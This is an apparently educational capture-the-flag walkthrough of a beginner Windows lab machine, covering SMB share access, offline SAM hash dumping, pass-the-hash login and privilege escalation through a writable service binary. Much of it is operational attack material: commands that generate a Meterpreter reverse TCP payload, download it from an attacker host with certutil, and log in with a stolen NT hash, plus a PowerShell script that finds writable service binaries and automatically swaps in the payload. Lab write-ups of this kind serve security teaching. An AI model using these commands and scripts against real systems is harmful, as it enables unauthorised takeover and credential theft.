Premise

In this walkthrough we demonstrate basic Windows privilege escalation by replacing a service executable that ordinary users can overwrite with our own payload. We also demonstrate retrieving Windows password hashes from an offline copy of the SAM hive and using one of them to authenticate with pass-the-hash.

Machine Name: SAM

Difficulty: Beginner

Skills Learned

  • Windows privilege escalation
  • Service exploitation (writable service binaries)
  • Offline SAM hash extraction and pass-the-hash

Finding a Way In

My first step was to run an Nmap scan to see what services were running. I found that SMB and RDP were open, but there was no web server, FTP, or SSH. This narrowed down my options, so I decided to focus on the SMB shares.

I used the smbclient command to list the available shares and found one called “backups.” I mounted this share and discovered that it contained a dump of the entire C drive. This is not something you’d typically see in a real-world scenario, but it made my job a lot easier!

With the file system mounted, I navigated to Windows\System32\config under the mount point, where the registry hives live, and ran samdump2 against the SAM and SYSTEM hives. SYSTEM is needed as well as SAM: it holds the boot key that samdump2 uses to decrypt the hashes, so copying SAM alone is not enough. The output is in pwdump format (user:RID:LM hash:NT hash:::). I found an NT hash for a user named “jamie,” and because evil-winrm accepts an NT hash directly (-H) there was no need to crack it: pass-the-hash gave me a PowerShell session on the machine, but only as a regular user.

Becoming the Admin

Now that I had a shell, my next goal was to become the administrator. I started by enumerating the services running on the machine and found a couple of interesting ones called “Monitor One” and “Monitor Two.” I used the icacls command to check the permissions on the monitor2.exe binary and discovered that the “Users” group had full control (F) over it. The Service Control Manager starts a service's binary under the service's own account, which is commonly a privileged one such as LocalSystem, so anyone who can overwrite that binary gets code execution as that account the next time the service starts. That meant I could replace the legitimate monitor2.exe with a payload of my own.

I used msfvenom to create a Windows Meterpreter reverse TCP payload and named it monitor2.exe. I then set up a Python web server on my machine to host the payload and used certutil on the target to download it. Two things to watch here: a running service keeps its image file locked, so the service has to be stopped before the file at its path can be overwritten; and a payload built with -f exe does not speak the service control protocol, so the SCM will kill it roughly 30 seconds after start (error 1053) unless you migrate out of it at once or build the payload with -f exe-service, which wraps it as a proper service executable.

With my malicious payload in place, all that was left to do was restart the “Monitor Two” service. I used sc stop and sc start for this (note that sc takes the service's key name, monitor2, not its display name, and that in a PowerShell session plain sc is an alias for Set-Content, so it must be invoked as sc.exe). As soon as the service started it executed my payload and gave me a Meterpreter session with full administrator privileges! 👑 If the low-privileged user lacks the right to stop or start the service, the same result comes at the next reboot, which you can force yourself only if whoami /priv shows SeShutdownPrivilege.

Even though I ran into some issues with the Meterpreter session being unstable, the core concept of exploiting a writable service to escalate privileges is a valuable one to know.
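The enumeration and the binary swap above, as an added PowerShell example that is not code from the walkthrough or its author: the first function lists every service whose executable the current token is allowed to modify (matching ACEs against the user's own SID and all group SIDs, which is how a grant to BUILTIN\Users is caught), and the second stops the service, backs up and overwrites its binary, and starts it again through sc.exe. The service name and binary path in the usage lines are the ones the walkthrough reports; the payload path, the .bak backup location, and the use of an exe-service payload (so the SCM does not kill the session after 30 seconds) are assumptions.

```powershell
# Added example (not the walkthrough's own code). Assumes a PowerShell session
# on the target as a low-privileged user, e.g. via evil-winrm.

function Get-WritableServiceBinaries {
    # SIDs of the current user plus every group in its token, so an ACE granted
    # to BUILTIN\Users or Authenticated Users is matched too. Deny ACEs are not
    # evaluated here; confirm a hit with icacls before relying on it.
    $token  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($token.User.Value) + @($token.Groups | ForEach-Object { $_.Value })

    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        # PathName may be quoted and may carry arguments; keep only the executable.
        if ($svc.PathName.StartsWith('"')) {
            $exe = $svc.PathName.Split('"')[1]
        } else {
            $i   = $svc.PathName.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
            $exe = if ($i -ge 0) { $svc.PathName.Substring(0, $i + 4) } else { $svc.PathName }
        }
        if (-not (Test-Path -LiteralPath $exe)) { continue }

        try { $acl = Get-Acl -LiteralPath $exe } catch { continue }
        $grants = foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { continue }
            if ($mySids -notcontains $sid) { continue }
            $rights = $ace.FileSystemRights.ToString()
            # Named rights that allow changing the file's contents; a bare number
            # means generic rights (GENERIC_ALL / GENERIC_WRITE), flagged for review.
            if ($rights -match '\b(FullControl|Modify|Write|WriteData)\b' -or $rights -match '^-?\d+$') {
                "$($ace.IdentityReference): $rights"
            }
        }
        if ($grants) {
            [pscustomobject]@{
                Name    = $svc.Name          # key name, what sc.exe expects (monitor2)
                Display = $svc.DisplayName   # e.g. "Monitor Two"
                RunsAs  = $svc.StartName     # account the replaced binary will run as
                State   = $svc.State
                Binary  = $exe
                Grants  = ($grants -join '; ')
            }
        }
    }
}

function Invoke-ServiceBinarySwap {
    param(
        [Parameter(Mandatory)] [string] $ServiceName,  # key name, not the display name
        [Parameter(Mandatory)] [string] $Binary,       # path the service starts
        [Parameter(Mandatory)] [string] $Payload       # assumed: msfvenom ... -f exe-service output
    )
    # Plain 'sc' is a PowerShell alias for Set-Content; call sc.exe explicitly.
    # A running service keeps its image file locked, so stop it before overwriting.
    # sc.exe exits with the Win32 error code; 1062 means it was already stopped.
    $out = sc.exe stop $ServiceName 2>&1
    if ($LASTEXITCODE -ne 0 -and $LASTEXITCODE -ne 1062) {
        throw "Could not stop ${ServiceName} (no stop right? a reboot would also restart it): $out"
    }
    Start-Sleep -Seconds 3
    Copy-Item -LiteralPath $Binary  -Destination "$Binary.bak" -Force   # keep the original for cleanup
    Copy-Item -LiteralPath $Payload -Destination $Binary -Force
    $out = sc.exe start $ServiceName 2>&1
    if ($LASTEXITCODE -ne 0) { throw "Could not start ${ServiceName}: $out" }
    sc.exe query $ServiceName
}

# Usage (service and binary path from the walkthrough; payload path is an assumption):
# Get-WritableServiceBinaries | Format-Table Name, RunsAs, State, Binary, Grants
# Invoke-ServiceBinarySwap -ServiceName monitor2 -Binary C:\services\monitor2.exe -Payload C:\Users\jamie\monitor2.exe
```

The RunsAs column is worth reading before swapping anything: it tells you which account the payload will land as, and a service running as a dedicated low-privileged account is not a privilege escalation. Restore the .bak copy and restart the service once you are done.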

Commands I Used

Here are some of the key commands I used during this process:

  • Listing SMB shares: smbclient -L //172.31.1.12
  • Mounting an SMB share: sudo mount -t cifs //172.31.1.12/backups /mnt/sam -o username=admin,password=
  • Dumping SAM hashes (SYSTEM hive first, then SAM; output is user:RID:LM hash:NT hash:::): samdump2 SYSTEM SAM > sam_hashes.txt
  • Pass-the-hash login with evil-winrm (-H takes the NT hash, the fourth field of the samdump2 output): ruby evil-winrm.rb -i 172.31.1.12 -u jamie -H <NTLM_HASH>
  • Checking file permissions: icacls C:\services\monitor2.exe
  • Generating a payload with msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f exe -o monitor2.exe
  • Starting a Python web server: python -m http.server 8000
  • Downloading a file with certutil: certutil.exe -urlcache -f http://10.10.0.12:8000/monitor2.exe monitor2.exe
  • Stopping and starting a service (use sc.exe in a PowerShell session, since plain sc is an alias for Set-Content; the argument is the service key name, not the display name): sc.exe stop monitor2 and sc.exe start monitor2

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
